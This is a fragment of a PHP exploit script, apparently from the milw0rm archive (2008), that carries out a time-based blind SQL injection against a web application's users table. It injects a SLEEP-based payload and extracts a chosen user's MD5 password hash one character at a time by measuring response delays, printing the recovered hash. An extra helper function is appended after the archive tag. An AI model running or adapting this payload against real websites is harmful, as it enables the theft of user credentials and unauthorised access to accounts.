die("\n[-] Login failed!\n"); } } $user = getusername($uid); print "\n[-] Username: {$user}"; $hash = array(0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102); $index = 1; $md5 = ""; print "\n[-] MD5 Hash: "; while (!strpos($md5, chr(0))) { for ($i = 0, $n = count($hash); $i <= $n; $i++) { if ($i == $n) { die("\n\n[-] Exploit failed...\n"); } $sql = "'OR(SELECT IF(ORD(SUBSTR(user_password,{$index},1))={$hash[$i]},SLEEP({$count}),1) FROM {$prefix}_users WHERE user_id={$uid})#"; if (getdelay($sql) >= $count * 1000) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; } } $index++; } if (!eregi("[0-9,a-f]{32}", $md5)) { print "\n\n[-] Invalid MD5 hash...\n"; } else { print "\n\n[-] Successfull!\n"; } ?> # milw0rm.com [2008-05-19]
function check_query($query) { global $ndelay; $ret = false; $d = intval(getdelay($query)); if ($d > $ndelay * 2) { $ret = true; } return $ret; }